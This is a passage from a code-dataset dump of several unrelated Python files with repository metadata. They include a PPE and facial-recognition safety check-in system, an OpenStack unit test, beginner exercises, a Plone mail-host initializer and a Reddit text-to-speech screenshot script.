new_breach[\"Workername\"] for breach in worker_breaches):\n worker_breaches.append(new_breach)\n\n # Check the length of the list after appending\n updated_length = len(worker_breaches)\n\n # Check if a new entry has been added\n if updated_length > initial_length:\n print(\"New entry has been added to the list.\")\n print(worker_breaches[-1])\n\n #Capture the frame with the plotting boxes for breach images\n frame_capture = imgBackground[158:158 + 480, 52:52 + 640]\n\n # Capture the frame as an image\n _, buffer = cv2.imencode(\".jpg\", frame_capture)\n encoded_image = base64.b64encode(buffer).decode(\"utf-8\")\n\n # Find the document with the highest breach ID\n largest_breach = collection2.find_one(sort=[(\"breach_id\", -1)])\n\n if largest_breach is None:\n next_breach_id = 1\n else:\n # Determine the next breach ID\n next_breach_id = largest_breach[\"breach_id\"] + 1\n\n Location = \"Entrance A\"\n\n worker_breach_name = worker_breaches[-1][\"Workername\"]\n worker_breach_description = worker_breaches[-1][\"Breach\"]\n\n # Save the encoded image in MongoDB\n collection2.insert_one({\n \"datetime\": datetime.now(),\n \"worker_name\": worker_breach_name,\n \"description\": worker_breach_description,\n \"breach_id\": next_breach_id,\n \"severity\": \"\",\n \"evidence_photo\": encoded_image,\n \"location\": Location,\n \"case_resolved\": False,\n \"case_resolution\": None,\n \"case_resolved_time\": None\n })\n\n description = worker_breach_description.split(\",\")\n description_array = [item.strip().replace(\"no-\", \"\") for item in description]\n tele_description = \", \".join(description_array)\n\n capture_image = frame_capture.copy()\n retval, buffer = cv2.imencode('.jpg', capture_image)\n image_bytes = buffer.tobytes()\n loop = asyncio.get_event_loop()\n loop.run_until_complete(send_message(bot_token, chat_id, worker_breach_name, tele_description, image_bytes, Location, next_breach_id))\n\ndef plot_bboxes(draw_box_ppe, image, boxes, labels=[], colors=[], score=True, conf=None):\n output = []\n \n # #Define COCO Labels\n # if labels == []:\n # labels = {0: u'__background__', 1: u'helmet', 2: u'no-helmet', 3: u'no-vest', 4: u'vest'}\n # #Define colors\n # colors = [(0,255,0),(0,0,255),(0,0,255),(0,255,0)]\n\n #Define COCO Labels\n if labels == []:\n labels = {0: u'__background__', 1: u'helmet', 2: u'mask', 3: u'no-helmet', \n 4: u'no-mask', 5: u'no-vest', 6: u'Person', \n 7: u'Safety 
Cone', 8: u'vest', 9: u'machinery', 10: u'vehicle'}\n # 'Hardhat', 'Mask', 'NO-Hardhat', 'NO-Mask', 'NO-Safety Vest', \n # 'Person', 'Safety Cone', 'Safety Vest', 'machinery', 'vehicle'\n #Define colors\n colors = [(0,255,0),(0,255,0),(0,0,255),\n (0,0,255),(0,0,255),(123,63,0),\n (123,63,0),(0,255,0),(123,63,0),(123,63,0)]\n\n label_list = []\n exclude_labels = ['Person', 'machinery', 'vehicle', 'Safety Cone']\n\n if(employee_data is not None):\n role = employee_data[\"position\"]\n if role == \"Supervisor\":\n exclude_labels = ['Person', 'machinery', 'vehicle', 'Safety Cone', 'no-mask']\n\n # plot each box\n for box in boxes:\n #add score in label if score=True\n if score :\n label = labels[int(box[-1])+1] + \" \" + str(round(100 * float(box[-2]),1)) + \"%\"\n else :\n label = labels[int(box[-1])+1]\n # skip any box below the conf threshold, if one is set\n if conf and box[-2] <= conf:\n continue\n color = colors[int(box[-1])]\n \n #box label\n if draw_box_ppe:\n if label not in label_list and label not in exclude_labels:\n label_list.append(label)\n\n lw = max(round(sum(image.shape) / 2 * 0.003), 2)\n p1, p2 = (int(box[0]), int(box[1])), (int(box[2]), int(box[3]))\n cv2.rectangle(image, p1, p2, color, thickness=lw, lineType=cv2.LINE_AA)\n tf = max(lw - 1, 1) # font thickness\n w, h = cv2.getTextSize(label, 0, fontScale=lw / 3, thickness=tf)[0] # text width, height\n outside = p1[1] - h >= 3\n p2 = p1[0] + w, p1[1] - h - 3 if outside else p1[1] + h + 3\n cv2.rectangle(image, p1, p2, color, -1, cv2.LINE_AA) # filled\n cv2.putText(image,\n label, (p1[0], p1[1] - 2 if outside else p1[1] + h + 2),\n 0,\n lw / 3,\n color=(255, 255, 255),\n thickness=tf,\n lineType=cv2.LINE_AA)\n output.append(label)\n return output\n\ndef facial_recognition(frame, draw_box_face, known_face_encodings, known_face_names, face_names, checkin_recorded):\n # Resize frame of video to 1/4 size for faster face recognition processing\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n rgb_small_frame = small_frame[:, :, ::-1]\n \n # Find all the faces and face encodings in the current frame of video\n face_locations = face_recognition.face_locations(rgb_small_frame)\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\n for face_encoding in face_encodings:\n # See if the face is a match for the known face(s)\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding, tolerance=0.5)\n name = \"Unknown\"\n\n # If a match was found in known_face_encodings, just use the first one.\n if True in matches:\n first_match_index = matches.index(True)\n name = known_face_names[first_match_index]\n\n else:\n # Or instead, use the known face with the smallest distance to the new face\n face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n \n face_names.append(name)\n\n # \"Number of workers working today\" feature:\n\n # Create a single document for each day to store all the worker check-ins\n checkin_data = {\n \"date\": datetime.now().strftime(\"%Y-%m-%d\"),\n \"check_ins\": []\n }\n\n # Check if the detected face is a known employee and insert check-in record\n if name != \"Unknown\" and name not in checkin_recorded:\n collection = db[\"workers\"]\n worker_data = 
collection.find_one({\"name\": name})\n if worker_data is not None:\n position = worker_data[\"position\"]\n worker_id = worker_data[\"worker_id\"]\n supervisor = worker_data[\"supervisor\"]\n else:\n position = None\n worker_id = None\n\n # collection = db[\"checkin_1\"]\n collection = db[\"checkin_2\"]\n\n\n print(\"=====================================================================================\")\n checkin_entry = {\n \"name\": name,\n \"worker_id\": worker_id,\n \"position\": position,\n \"supervisor\": supervisor,\n \"time\": datetime.now()\n }\n checkin_data[\"check_ins\"].append(checkin_entry)\n checkin_recorded.add(name)\n\n # Insert the check-in data for the day into the MongoDB collection\n collection.update_one({\"date\": checkin_data[\"date\"]}, \n {\"$push\": {\"check_ins\": {\"$each\": checkin_data[\"check_ins\"]}}}, \n upsert=True)\n \n #Draw Box for Face\n if draw_box_face:\n for (top, right, bottom, left) in face_locations:\n # Scale back up face locations since the frame we detected in was scaled to 1/4 size\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n\n # Draw a box around the face\n if name != \"Unknown\":\n cv2.rectangle(imgBackground[158:158 + 480, 52:52 + 640], (left, top), (right, bottom), (0, 255, 0), 2)\n cv2.rectangle(imgBackground[158:158 + 480, 52:52 + 640], (left, bottom - 35), (right, bottom), (0, 255, 0), cv2.FILLED)\n cv2.putText(imgBackground[158:158 + 480, 52:52 + 640], name, (left + 6, bottom - 6), cv2.FONT_HERSHEY_DUPLEX, 1.0, (255, 255, 255), 1)\n\ndef main():\n encoding_list = retrieve_encoding()\n\n checkin_recorded = set() # Initializes an empty set called checkin_recorded. This set will be used to keep track of the names of employees who have already checked in to avoid duplicates.\n \n # Create a worker_breaches_list to keep track of workers with PPE breaches\n worker_breaches = []\n\n item_number = 0\n counter = 0\n\n known_face_encodings = [encoding[1] for encoding in encoding_list]\n known_face_names = [encoding[0] for encoding in encoding_list]\n \n face_names = []\n ppe_list = []\n draw_box_face = True\n draw_box_ppe = False\n\n while True:\n # Grab a single frame of video\n ret, frame = video_capture.read() \n\n imgBackground[158:158 + 480, 52:52 + 640] = frame\n imgBackground[30:30 + 674, 800:800 + 440] = model\n ROI = imgBackground[158:158 + 480, 52 + 160 :52 + 480]\n\n facial_recognition(frame, draw_box_face, known_face_encodings, known_face_names, face_names, checkin_recorded)\n\n cv2.putText(imgBackground, \"Authenticating...\", (910, 655), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 255), 2)\n\n cv2.imshow('SAFETY CONSTRUCTION SYSTEM', imgBackground)\n\n results = ai_model.predict(ROI, verbose=False)\n #PPE_list - 3 Dimensions Array\n ppe_item = plot_bboxes(draw_box_ppe, ROI, results[0].boxes.data, score=False, conf=0.85)\n\n ppe_list.append(ppe_item)\n #print(ppe_list)\n print(ppe_item)\n print(face_names[-10:])\n\n #Find the most face detect\n if len(face_names) > 10:\n draw_box_face = False\n draw_box_ppe = True\n #face_names = face_names[-15:]\n \n most_frequent_name = Counter(face_names[:10]).most_common(1)[0][0]\n print(\"Session Holder: \" + most_frequent_name)\n\n if most_frequent_name != \"Unknown\" and most_frequent_name != None:\n if employee_data == None or employee_data['name'] != most_frequent_name: \n thread = search_data_thread(most_frequent_name)\n # Set the stop_event object to stop the thread\n stop_event.set()\n # Wait for the thread to finish\n thread.join()\n # Reset the stop_event object for the 
next iteration\n stop_event.clear()\n\n role = employee_data[\"position\"]\n \n cv2.rectangle(imgBackground, (52 + 160, 161), (52 + 480, 636), (0,255,0), 1, cv2.LINE_AA) \n cv2.putText(imgBackground, \"Hi, \" + most_frequent_name, (875, 120), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 255), 2)\n cv2.putText(imgBackground, \"PPE Require:\", (830, 290), cv2.FONT_HERSHEY_COMPLEX, 0.7, (255, 255, 255), 2)\n cv2.putText(imgBackground, \"Your Role is:\", (835, 210), cv2.FONT_HERSHEY_COMPLEX, 0.7, (255, 255, 255), 2)\n\n if most_frequent_name == \"Astro\":\n imgBackground[50:50 + 108, 1105:1105 + 108] = imgAvaList[0]\n cv2.putText(imgBackground, role, (845, 235), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 255), 1)\n \n elif most_frequent_name == \"Chris\":\n imgBackground[50:50 + 108, 1105:1105 + 108] = imgAvaList[1]\n cv2.putText(imgBackground, role, (845, 235), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 255), 1)\n \n elif most_frequent_name == \"Daren\":\n imgBackground[50:50 + 108, 1105:1105 + 108] = imgAvaList[2]\n cv2.putText(imgBackground, role, (845, 235), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 255), 1)\n\n elif most_frequent_name == \"Loc\":\n imgBackground[50:50 + 108, 1105:1105 + 108] = imgAvaList[3]\n cv2.putText(imgBackground, role, (845, 235), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 255), 1)\n\n ppe_helmet = None\n ppe_vest = None\n ppe_mask = None\n\n if len(ppe_list) > 10:\n ppe_list = ppe_list[-10:]\n #if PPE existing more than 5 frames is True, less than 2 frames is as False\n if role != \"Supervisor\":\n if sum(sublist.count(\"no-helmet\") for sublist in ppe_list) <= 3:\n if sum(sublist.count(\"helmet\") for sublist in ppe_list) >= 3:\n imgBackground[300:300 + 137, 865:865 + 125] = imgPpeList[0]\n ppe_helmet = True\n elif sum(sublist.count(\"helmet\") for sublist in ppe_list) <= 2:\n imgBackground[300:300 + 137, 865:865 + 125] = imgPpeList[3]\n ppe_helmet = False\n else:\n imgBackground[300:300 + 137, 865:865 + 125] = imgPpeList[3]\n ppe_helmet = False\n \n if sum(sublist.count(\"no-vest\") for sublist in ppe_list) <= 3:\n if sum(sublist.count(\"vest\") for sublist in ppe_list) >= 3:\n imgBackground[440:440 + 137, 865:865 + 125] = imgPpeList[1]\n ppe_vest = True\n elif sum(sublist.count(\"vest\") for sublist in ppe_list) <= 2:\n imgBackground[440:440 + 137, 865:865 + 125] = imgPpeList[4]\n ppe_vest = False\n else:\n imgBackground[440:440 + 137, 865:865 + 125] = imgPpeList[4]\n ppe_vest = False\n \n if sum(sublist.count(\"no-mask\") for sublist in ppe_list) <= 3:\n if sum(sublist.count(\"mask\") for sublist in ppe_list) >= 3:\n imgBackground[300:300 + 137, 1040:1040 + 125] = imgPpeList[2]\n ppe_mask = True\n elif sum(sublist.count(\"mask\") for sublist in ppe_list) <= 2:\n imgBackground[300:300 + 137, 1040:1040 + 125] = imgPpeList[5]\n ppe_mask = False\n else:\n imgBackground[300:300 + 137, 1040:1040 + 125] = imgPpeList[5]\n ppe_mask = False\n else:\n ppe_mask = True\n if sum(sublist.count(\"no-helmet\") for sublist in ppe_list) <= 3:\n if sum(sublist.count(\"helmet\") for sublist in ppe_list) >= 3:\n imgBackground[300:300 + 137, 865:865 + 125] = imgPpeList[0]\n ppe_helmet = True\n elif sum(sublist.count(\"helmet\") for sublist in ppe_list) <= 2:\n imgBackground[300:300 + 137, 865:865 + 125] = imgPpeList[3]\n ppe_helmet = False\n else:\n imgBackground[300:300 + 137, 865:865 + 125] = imgPpeList[3]\n ppe_helmet = False\n \n if sum(sublist.count(\"no-vest\") for sublist in ppe_list) <= 3:\n if sum(sublist.count(\"vest\") for sublist in ppe_list) >= 3:\n 
imgBackground[300:300 + 137, 1040:1040 + 125] = imgPpeList[1]\n ppe_vest = True\n elif sum(sublist.count(\"vest\") for sublist in ppe_list) <= 2:\n imgBackground[300:300 + 137, 1040:1040 + 125] = imgPpeList[4]\n ppe_vest = False\n else:\n imgBackground[300:300 + 137, 1040:1040 + 125] = imgPpeList[4]\n ppe_vest = False\n \n #Set the Message if both PPE detected\n if ppe_helmet and ppe_vest and ppe_mask:\n imgBackground[635:635 + 35, 900:900 + 300] = clear_text\n cv2.putText(imgBackground, \"You are good to go. Stay Safe!\", (905, 655), cv2.FONT_HERSHEY_COMPLEX_SMALL, 0.8, (255, 255, 255), 2)\n else:\n imgBackground[635:635 + 35, 900:900 + 300] = clear_text\n cv2.putText(imgBackground, \"Please wear PPE!!\", (910, 655), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 255), 2)\n\n\n #REFRESH SESSIONS\n if ppe_item:\n item_number += 1\n\n if item_number % 5 == 0 and most_frequent_name != \"Unknown\":\n counter += 1\n print(\"Session Time: \" + str(counter))\n imgBackground[120:120 + 23, 50:50 + 440] = clear_text2 \n cv2.putText(imgBackground, \"Session Ends in \" + str(16 - counter), (50, 140), cv2.FONT_HERSHEY_COMPLEX, 0.8, (0, 0, 255), 1)\n\n #Alert Before SESSION ENDS\n if counter > 15:\n #ALERT WHEN BREACH HAPPENED\n breach_ppe = \"\"\n if not ppe_helmet:\n breach_ppe += \"no-helmet , \"\n if not ppe_vest:\n breach_ppe += \"no-vest , \"\n if not ppe_mask:\n breach_ppe += \"no-mask , \"\n\n breach_ppe = breach_ppe[:-3]\n print(breach_ppe)\n\n if breach_ppe != \"\":\n alert_process(breach_ppe, most_frequent_name, worker_breaches)\n\n #RESET SESSIONS\n imgBackground[120:120 + 23, 50:50 + 440] = clear_text2 \n face_names.clear()\n counter = 0\n draw_box_face = True\n draw_box_ppe = False\n \n if most_frequent_name == \"Unknown\":\n #RESET SESSIONS IF NO ONE DETECTED\n imgBackground[120:120 + 23, 50:50 + 440] = clear_text2 \n face_names.clear()\n counter = 0\n draw_box_face = True\n draw_box_ppe = False\n\n # Display the results\n cv2.imshow('SAFETY CONSTRUCTION SYSTEM', imgBackground)\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # Release handle to the webcam\n video_capture.release()\n cv2.destroyAllWindows()\n\n# encoding = train_encoding(\"Loc.1.jpg\")\n# save_encodings(encoding)\nvideo_capture = cv2.VideoCapture(0)\nvideo_capture.set(3, 640)\nvideo_capture.set(4, 480)\n\nmain()","repo_name":"BeginnerLoc/Flask-Server","sub_path":"ai_server/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":25497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31409986556","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom openstack.tests.unit import base\n\nfrom otcextensions.sdk.identity.v3 import agency\n\n\nFAKE_ID = \"945d-fe449be00148\"\nEXAMPLE = {\n \"trust_domain_name\": \"exampledomain\",\n \"description\": \" testsfdas \",\n \"trust_domain_id\": \"b3f266d0c08544a0859740de8b84e850\",\n \"id\": \"afca8ddf2e92469a8fd26a635da5206f\",\n \"duration\": None,\n \"create_time\": \"2017-01-04T09:09:15.000000\",\n \"expire_time\": None,\n \"domain_id\": \"0ae9c6993a2e47bb8c4c7a9bb8278d61\",\n \"name\": \"exampleagency\"\n}\n\n\nclass TestAgency(base.TestCase):\n\n def setUp(self):\n super(TestAgency, self).setUp()\n\n def test_basic(self):\n sot = agency.Agency()\n\n self.assertEqual('/v3.0/OS-AGENCY/agencies', sot.base_path)\n self.assertEqual('agencies', sot.resources_key)\n self.assertEqual('agency', sot.resource_key)\n\n self.assertTrue(sot.allow_list)\n self.assertTrue(sot.allow_fetch)\n self.assertTrue(sot.allow_create)\n self.assertTrue(sot.allow_delete)\n self.assertTrue(sot.allow_commit)\n\n self.assertDictEqual({\n 'domain_id': 'domain_id',\n 'limit': 'limit',\n 'marker': 'marker',\n 'name': 'name',\n 'trust_domain_id': 'trust_domain_id'},\n sot._query_mapping._mapping\n )\n\n def test_make_it(self):\n\n sot = agency.Agency(connection=self.cloud, **EXAMPLE)\n # Check how the override with \"real\" connection works\n self.assertEqual(\n 'https://identity.example.com/v3.0/OS-AGENCY/agencies',\n sot.base_path)\n\n self.assertEqual(EXAMPLE['id'], sot.id)\n self.assertEqual(EXAMPLE['description'], sot.description)\n self.assertEqual(EXAMPLE['trust_domain_id'], sot.trust_domain_id)\n self.assertEqual(EXAMPLE['create_time'], sot.created_at)\n self.assertEqual(EXAMPLE['expire_time'], sot.expire_at)\n self.assertEqual(EXAMPLE['domain_id'], sot.domain_id)\n","repo_name":"opentelekomcloud/python-otcextensions","sub_path":"otcextensions/tests/unit/sdk/identity/v3/test_agency.py","file_name":"test_agency.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"95"} +{"seq_id":"20618548508","text":"\"\"\"\n### Zadanie 2.3\n​\nNapisz program, który odczytuje od użytkownika wiele liczb.\n​\nProgram powinien wyliczyć i na końcu wypisać następujące statystyki:\n​\n- liczba podanych liczb (ile sztuk),\n- suma,\n- średnia,\n- minimum\n- maksimum\n​\nNIE używaj funkcji wbudowanych!\n​\n\"\"\"\n\ni = 0\nsuma = 0\nmax = None\nmin = None\nsrednia = None\n\nwhile True:\n liczba = input(\"Podaj liczbę lub wpisz koniec aby zakończyć: \")\n if liczba == \"koniec\":\n break\n liczba = int(liczba)\n\n if max == None:\n max = liczba\n min = liczba\n if max < liczba:\n max = liczba\n if min > liczba:\n min = liczba\n\n suma += liczba\n i += 1\nif i>0:\n print(f\"\"\"Max: {max}\n Min: {min}\n Suma: {suma}\n Ilość liczb: {i}\n Średnia: {suma/i}\n \"\"\")\nelse:\n print(\"Nie podales żadnej liczby więc nie moge podać wyniku\")","repo_name":"RasNadi/zadanie_domowe_rp","sub_path":"zadanie_domowe_rp/zad2.3_rp.py","file_name":"zad2.3_rp.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"41077276334","text":"\n# 01\ndef name_letters(): \n name = input('Digite seu nome: ')\n\n for letra in name:\n print(letra)\n\n# 02\ndef numbers_sum():\n numbers = []\n soma = 0\n while len(numbers) < 1:\n numbers = input('Digite os numeros separados por um 
espaço: ').split()\n for number in numbers:\n if not number.isdigit(): \n print(f'Erro ao somar valores, {number} é um valor inválido')\n else:\n soma += int(number)\n print(soma)\n\n# 03\n\ndef reprovados():\n line_list = []\n with open(\"arquivo.txt\", \"r\") as file:\n for line in file:\n line_tupla = line.split()\n if int(line_tupla[1]) < 6:\n line_list.append(line_tupla)\n file.close()\n print(line_list)\n","repo_name":"luizlacerdam/trybe-exercicios","sub_path":"04-cs/section-01-python/day-02-input-output-with-testing/exercicio-de-aula.py","file_name":"exercicio-de-aula.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19474738986","text":"# -*- coding: utf-8 -*-\nfrom App.config import getConfiguration\n\nimport logging\nimport os\n\n\nLOG = None\nENABLED = None\nFIXED_ADDRESS = []\n\nTRUISMS = [\"yes\", \"y\", \"true\", \"on\"]\nDevelopmentMode = False\n\n\ndef initialize(context):\n global LOG\n global FIXED_ADDRESS\n global ENABLED\n LOG = logging.getLogger(\"PrintingMailHost\")\n\n ENABLED = os.environ.get(\"ENABLE_PRINTING_MAILHOST\", None)\n addresses = os.environ.get(\"PRINTING_MAILHOST_FIXED_ADDRESS\", \"\")\n FIXED_ADDRESS = [addr for addr in addresses.strip().split(\" \") if addr]\n\n # check to see if the environment var is set to a 'true' value\n if (ENABLED is not None and ENABLED.lower() in TRUISMS) or (\n ENABLED is None and getConfiguration().debug_mode is True\n ):\n # DevelopmentMode is checked by plone.api\n DevelopmentMode = True # noqa\n LOG.warning(\"Hold on to your hats folks, I'm a-patchin'\")\n from Products.PrintingMailHost import Patch\n\n Patch # pyflakes\n","repo_name":"collective/Products.PrintingMailHost","sub_path":"Products/PrintingMailHost/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"21779329233","text":"#!/usr/bin/env python3\nimport asyncio\nfrom contextlib import closing\nimport csv\nimport os\nimport io\nfrom xml.dom import minidom\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\nimport sqlite3\nimport gtts\nfrom selenium import webdriver\nimport PIL.Image\nimport ffmpeg\n\nbrowsers = {\n 'chrome': webdriver.Chrome,\n 'firefox': webdriver.Firefox,\n}\nbrowser_options = {\n 'chrome': webdriver.chrome.options.Options(),\n 'firefox': webdriver.FirefoxOptions(),\n}\nchrome = browser_options['chrome']\nchrome.add_argument(\"--headless\")\nchrome.add_argument(\"--window-size=1280,720\")\nchrome.add_argument(\"--enable-use-zoom-for-dsf=false\")\nchrome.add_argument(\"--hide-scrollbars\")\nchrome.add_argument(\"--mute-audio\")\nchrome.add_argument(\"--disable-default-apps\")\nchrome.add_argument(\"--disable-extensions\")\nchrome.add_argument(\"--disable-component-update\")\nchrome.add_argument(\"--disable-back-forward-cache\")\nchrome.add_argument(\"--disable-backgrounding-occluded-windows\")\n\nfirefox = browser_options['firefox']\nfirefox.add_argument(\"--headless\")\nfirefox.add_argument(\"--width=1280\")\nfirefox.add_argument(\"--height=720\")\n\n\nbrowser_type = os.getenv('AITA_BROWSER', 'chrome')\nassert browser_type in ('chrome', 'firefox')\n\ninference_folder = os.path.dirname(os.path.abspath(__file__))\n\nplayed_dht = os.path.join(inference_folder, 'played.db')\nif not os.path.exists(played_dht):\n raise Exception(\"You need to run 'clean_csvs.py' in the dataset folder first to get the Reddit 
posts.\")\n\nremoved_im_path = os.path.join(inference_folder, 'removed.svg')\nremoved_im = minidom.parse(removed_im_path).getElementsByTagName('path')[0].getAttribute('d')\ndeleted_im_path = os.path.join(inference_folder, 'deleted.svg')\ndeleted_im = minidom.parse(deleted_im_path).getElementsByTagName('path')[0].getAttribute('d')\nawaiting_im_path = os.path.join(inference_folder, 'awaiting.svg')\nawaiting_im = minidom.parse(deleted_im_path).getElementsByTagName('path')[0].getAttribute('d')\n\nuse_named_pipes = os.getenv('AITA_NAMED_PIPES', '') == '1'\n\ngtts.tokenizer.symbols.SUB_PAIRS.extend((\n ('YTA', \"You're the asshole\"),\n ('NTA', \"Not the asshole\"),\n ('ESH', \"Everyone sucks here\"),\n ('NAH', \"No assholes here\"),\n ('AITA', \"Am I the asshole\"),\n ('WIBTA', \"Would I be the asshole\"),\n # ('tl;dr', \"Tea El Dee Are\"),\n))\n\nasync def tts(selftext, comment, redd_id):\n # Create a named pipe if on Unix\n # This will make the processing faster\n if use_named_pipes:\n try:\n os.mkfifo(f'tmp_0_{redd_id}.mp3')\n os.mkfifo(f'{redd_id}.mp3')\n except OSError as oe:\n if oe.errno != errno.EEXIST:\n raise\n\n segments = []\n\n # The actual text\n with open(f'tmp_0_{redd_id}.mp3', 'wb') as f:\n tts = gtts.gTTS(selftext, lang='en')\n tts.write_to_fp(f)\n\n audio = ffmpeg.input(f'tmp_0_{redd_id}.mp3')\n segments.append(audio)\n\n # Silence\n audio = ffmpeg.input(\n 'anullsrc=channel_layout=mono:sample_rate=24000',\n format='lavfi',\n t=1 # how long you want the silence to be in seconds\n )\n segments.append(audio)\n\n # The comment\n audio = ffmpeg.input(f'pipe:')\n segments.append(audio)\n\n combined = ffmpeg.concat(*segments, v=0, a=1)\n process = combined.output(f'{redd_id}.mp3').global_args('-loglevel', 'error') \\\n .run_async(pipe_stdin=True)\n\n tts = gtts.gTTS(comment, lang='en')\n tts.write_to_fp(process.stdin)\n process.stdin.close()\n process.wait()\n\n os.remove(f'tmp_0_{redd_id}.mp3')\n\n\nasync def get_videos(posts, model, limit=-1):\n new_snips = 0\n tts_promises = []\n\n if limit == 0: return 0\n\n with browsers[browser_type](options=browser_options[browser_type]) as driver, \\\n closing(sqlite3.connect(played_dht)) as con:\n dx, dy = driver.execute_script(\"var w=window; return [w.outerWidth - w.innerWidth, w.outerHeight - w.innerHeight];\")\n if dx > 0 and dy > 0:\n driver.set_window_size(1280 + dx, 720 + dy)\n\n driver.get('https://www.reddit.com/r/AmItheAsshole') # Load some cookies?\n\n for post in posts:\n selftext = post['selftext']\n url = post['url']\n redd_id = post['id']\n if con.execute(\"SELECT * FROM PostsPlayed WHERE PostId == ?\", (redd_id,)).fetchone(): # will be none by default\n continue\n im_path = f'{redd_id}.png'\n no_img = not os.path.exists(im_path)\n\n if no_img:\n print(f\"capture {redd_id}\")\n driver.get(url)\n\n # Test to see if the page was removed\n if any(\n tag.get_attribute('d') in (removed_im, deleted_im, awaiting_im)\n for tag in driver.find_elements(webdriver.common.by.By.TAG_NAME, 'path')\n ):\n con.execute('INSERT INTO PostsPlayed VALUES (?,?,?)', (redd_id, True, 0))\n con.commit()\n print(f'{redd_id} was removed')\n continue\n\n # Start downloading the mp3 before the screenshot is taken to save\n # a little bit of time\n if not os.path.exists(f'{redd_id}.mp3'):\n print(f\"tts {redd_id}\")\n comment = model(post)\n if comment is None:\n con.execute('INSERT INTO PostsPlayed VALUES (?,?,?)', (redd_id, True, 0))\n con.commit()\n print(f'no AI comment {redd_id}')\n continue\n tts_promises.append(tts(selftext, comment, redd_id))\n 
new_snips += 1\n\n # Take the screenshot if the photo isn't there\n if no_img:\n (\n webdriver.ActionChains(driver)\n .scroll_by_amount(0, 224)\n .perform()\n )\n\n png = driver.get_screenshot_as_png()\n\n if use_named_pipes:\n try:\n os.mkfifo(f'{redd_id}.png')\n except OSError as oe:\n if oe.errno != errno.EEXIST:\n raise\n\n # Reduce resolution so my poor MacBook Air will be happy.\n im = PIL.Image.open(io.BytesIO(png))\n im = im.resize((1280, 720))\n im.save(im_path)\n\n if new_snips == limit:\n break\n\n for promise in tts_promises:\n await promise\n\n return new_snips\n\ndef load_model(model_path):\n cwd = os.getcwd()\n os.chdir(os.path.dirname(__file__))\n import nnsave\n os.chdir(cwd)\n\n model_path = os.path.join(os.getcwd(), model_path)\n models_folder = os.path.join(os.path.dirname(__file__), '..')\n with nnsave.PackageSandbox(models_folder) as sand:\n model = sand.load_pickle(os.path.relpath(model_path, models_folder))\n from models.wrappers import Commenter, _fallback\n if not isinstance(model, Commenter):\n print(\"Model not Commenter. Rewrapping.\")\n model = _fallback(model)\n return model\n # os.chdir(os.path.join(os.path.dirname(__file__), '../models'))\n # with open(model_path, 'rb') as f:\n # model = pickle.load(f)\n # os.chdir(cwd)\n # return model\n\ndef load_posts(path):\n if path is None:\n # SQL database\n with closing(sqlite3.connect(played_dht)) as con:\n con.row_factory = sqlite3.Row\n while True:\n yield from con.execute(\"\"\"\n SELECT Posts.* FROM Posts\n LEFT JOIN PostsPlayed ON PostsPlayed.PostId == Posts.id\n WHERE PostsPlayed.PostId IS NULL\n \"\"\").fetchall()\n else:\n # CSV\n if not os.path.isabs(path):\n path = os.path.join('..', path)\n with open(path, 'r') as f:\n yield from csv.DictReader(f)\n\nif __name__ == '__main__':\n import argparse\n p = argparse.ArgumentParser(description=\"Download audio snippets from gTTS\")\n p.add_argument(\"-path\", help=\"path of the posts.csv from the dataset\", default=None) # '../dataset/posts_inference.csv'\n p.add_argument(\"-model\", help=\"path of the model.pkl file\", default='../models/sklearn_models/saved_models/nn_regressor_nrows=20000_generic.pkl')\n p.add_argument(\"-limit\", help=\"the number of audio clips to download\", type=int, default=-1)\n P = p.parse_args()\n\n model_path = os.path.join(os.path.dirname(__file__), P.model)\n model = load_model(model_path)\n\n os.chdir(os.path.join(os.path.dirname(__file__), 'streams'))\n asyncio.run(get_videos(load_posts(P.path), model, P.limit))\n","repo_name":"adichand/AITAJudge","sub_path":"inference/get_audio.py","file_name":"get_audio.py","file_ext":"py","file_size_in_byte":7880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23468108450","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 11 10:47:32 2021\n\n@author: Dean\n\nRun this script to identify cross-calibration models and tune model parameters \nfor Pic2 vs Pic1 water concentration and isotope ratios. \n\nSeparate models are tuned for ORACLES 2017 and 2018. For each year, all dates \nwhere there is good WISPER data are used; For 2017, Aug. 
